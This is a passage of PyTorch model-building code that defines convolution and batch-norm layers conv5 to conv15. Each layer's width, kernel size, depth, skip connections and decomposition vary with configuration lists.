self.conv5 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv5 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[5] == 1:
self.conv5_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[5] == 1:
self.conv5_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn5 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[5] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[5] / 4) * 4)
if self.widen_list[6] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[6] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[6] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[6])
params[3] = params[3] + 2* int(self.kerneladd_list[6])
params[6] = params[6] + int(self.kerneladd_list[6])
params[7] = params[7] + int(self.kerneladd_list[6])
if self.decompo_list != None:
if self.decompo_list[6] == 1:
self.conv6_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 2:
self.conv6_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 3:
self.conv6_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[6] == 4:
self.conv6_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv6_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv6 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv6 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[6] == 1:
self.conv6_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[6] == 1:
self.conv6_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn6 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[6] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[6] / 4) * 4)
if self.widen_list[7] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[7] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[7] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[7])
params[3] = params[3] + 2* int(self.kerneladd_list[7])
params[6] = params[6] + int(self.kerneladd_list[7])
params[7] = params[7] + int(self.kerneladd_list[7])
if self.decompo_list != None:
if self.decompo_list[7] == 1:
self.conv7_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 2:
self.conv7_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 3:
self.conv7_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[7] == 4:
self.conv7_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv7_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv7 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv7 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[7] == 1:
self.conv7_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[7] == 1:
self.conv7_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn7 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[7] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[7] / 4) * 4)
if self.widen_list[8] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[8] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[8] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[8])
params[3] = params[3] + 2* int(self.kerneladd_list[8])
params[6] = params[6] + int(self.kerneladd_list[8])
params[7] = params[7] + int(self.kerneladd_list[8])
if self.decompo_list != None:
if self.decompo_list[8] == 1:
self.conv8_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[8] == 2:
self.conv8_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[8] == 3:
self.conv8_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[8] == 4:
self.conv8_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv8_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv8 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv8 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[8] == 1:
self.conv8_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[8] == 1:
self.conv8_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn8 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[8] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[8] / 4) * 4)
if self.widen_list[9] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[9] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[9] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[9])
params[3] = params[3] + 2* int(self.kerneladd_list[9])
params[6] = params[6] + int(self.kerneladd_list[9])
params[7] = params[7] + int(self.kerneladd_list[9])
if self.decompo_list != None:
if self.decompo_list[9] == 1:
self.conv9_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[9] == 2:
self.conv9_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[9] == 3:
self.conv9_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[9] == 4:
self.conv9_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv9_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv9 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv9 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[9] == 1:
self.conv9_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[9] == 1:
self.conv9_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn9 = torch.nn.BatchNorm2d(params[1])
params = [16, 16, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[9] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[9] / 4) * 4)
if self.widen_list[10] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[10] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[10] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[10])
params[3] = params[3] + 2* int(self.kerneladd_list[10])
params[6] = params[6] + int(self.kerneladd_list[10])
params[7] = params[7] + int(self.kerneladd_list[10])
if self.decompo_list != None:
if self.decompo_list[10] == 1:
self.conv10_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[10] == 2:
self.conv10_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[10] == 3:
self.conv10_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[10] == 4:
self.conv10_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv10_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv10 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv10 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[10] == 1:
self.conv10_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[10] == 1:
self.conv10_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn10 = torch.nn.BatchNorm2d(params[1])
params = [16, 32, 3, 3, 2, 2, 1, 1]
if self.widen_list != None:
if self.widen_list[10] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[10] / 4) * 4)
if self.widen_list[11] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[11] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[11] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[11])
params[3] = params[3] + 2* int(self.kerneladd_list[11])
params[6] = params[6] + int(self.kerneladd_list[11])
params[7] = params[7] + int(self.kerneladd_list[11])
if self.decompo_list != None:
if self.decompo_list[11] == 1:
self.conv11_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[11] == 2:
self.conv11_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[11] == 3:
self.conv11_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[11] == 4:
self.conv11_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv11_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv11 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv11 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[11] == 1:
self.conv11_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[11] == 1:
self.conv11_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn11 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[11] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[11] / 4) * 4)
if self.widen_list[12] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[12] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[12] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[12])
params[3] = params[3] + 2* int(self.kerneladd_list[12])
params[6] = params[6] + int(self.kerneladd_list[12])
params[7] = params[7] + int(self.kerneladd_list[12])
if self.decompo_list != None:
if self.decompo_list[12] == 1:
self.conv12_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[12] == 2:
self.conv12_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[12] == 3:
self.conv12_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[12] == 4:
self.conv12_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv12_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv12 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv12 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[12] == 1:
self.conv12_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[12] == 1:
self.conv12_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn12 = torch.nn.BatchNorm2d(params[1])
params = [16, 32, 1, 1, 2, 2, 0, 0]
if self.widen_list != None:
if self.widen_list[12] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[12] / 4) * 4)
if self.widen_list[13] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[13] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[13] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[13])
params[3] = params[3] + 2* int(self.kerneladd_list[13])
params[6] = params[6] + int(self.kerneladd_list[13])
params[7] = params[7] + int(self.kerneladd_list[13])
if self.decompo_list != None:
if self.decompo_list[13] == 1:
self.conv13_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[13] == 2:
self.conv13_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[13] == 3:
self.conv13_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[13] == 4:
self.conv13_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv13_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv13 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv13 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[13] == 1:
self.conv13_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[13] == 1:
self.conv13_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn13 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[13] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[13] / 4) * 4)
if self.widen_list[14] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[14] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[14] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[14])
params[3] = params[3] + 2* int(self.kerneladd_list[14])
params[6] = params[6] + int(self.kerneladd_list[14])
params[7] = params[7] + int(self.kerneladd_list[14])
if self.decompo_list != None:
if self.decompo_list[14] == 1:
self.conv14_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[14] == 2:
self.conv14_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_1 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_2 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_3 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[14] == 3:
self.conv14_0 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_1 = torch.nn.Conv2d(int(params[0]/2), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[14] == 4:
self.conv14_0 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_1 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_2 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv14_3 = torch.nn.Conv2d(int(params[0]/4), params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv14 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
else:
self.conv14 = torch.nn.Conv2d(params[0], params[1], (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
if self.deepen_list != None:
if self.deepen_list[14] == 1:
self.conv14_dp = torch.nn.Conv2d(params[1], params[1], (1, 1), stride=(1, 1), padding=(0, 0))
if self.skipcon_list != None:
if self.skipcon_list[14] == 1:
self.conv14_sk = torch.nn.Conv2d(params[1], params[1], (params[2], params[3]), stride=(1, 1), padding=(int((params[2] - 1)/2), int((params[3] - 1)/2)))
self.conv_bn14 = torch.nn.BatchNorm2d(params[1])
params = [32, 32, 3, 3, 1, 1, 1, 1]
if self.widen_list != None:
if self.widen_list[14] > 1.0:
params[0] = int(np.floor(params[0] * self.widen_list[14] / 4) * 4)
if self.widen_list[15] > 1.0:
params[1] = int(np.floor(params[1] * self.widen_list[15] / 4) * 4)
if self.kerneladd_list != None:
if self.kerneladd_list[15] > 0:
params[2] = params[2] + 2* int(self.kerneladd_list[15])
params[3] = params[3] + 2* int(self.kerneladd_list[15])
params[6] = params[6] + int(self.kerneladd_list[15])
params[7] = params[7] + int(self.kerneladd_list[15])
if self.decompo_list != None:
if self.decompo_list[15] == 1:
self.conv15_0 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
self.conv15_1 = torch.nn.Conv2d(params[0], int(params[1]/2), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
elif self.decompo_list[15] == 2:
self.conv15_0 = torch.nn.Conv2d(params[0], int(params[1]/4), (params[2], params[3]), stride=(params[4], params[5]), padding=(params[6], params[7]))
